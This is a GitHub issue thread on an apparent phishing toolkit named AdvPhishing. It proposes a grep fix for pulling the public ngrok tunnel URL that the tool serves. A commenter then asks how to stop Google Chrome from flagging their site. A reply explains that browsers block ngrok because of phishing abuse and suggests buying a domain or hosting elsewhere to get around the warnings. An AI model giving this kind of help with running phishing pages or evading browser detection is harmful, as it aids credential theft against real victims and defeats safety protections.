### ISSUE TITLE
grep should be fixed to show the full link in new version of NGROK

### ISSUE THREAD

**Issue by hossein-mohseni** [Ignitetch/AdvPhishing#143]
this should be edited:
`curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "[0-9a-z]*\.ngrok.io"`

To this:
`curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "[-.0-9a-z]*\.ngrok.io"`

**Comment by cybernoob13123** [comment]
where is the file should i change it?

**Comment by cybernoob13123** [comment]
@security-hm 
I already change it, But the website is detected by google chrome . How to fix it bro, please help

**Comment by security-hm** [comment]
> 

This is because lots of people use ngrok for phishing and 
for illegal  propose so Google chrome and Firefox now showing that this website is not safe so you can't do anything except if you buy domain or use another way to publish your local host
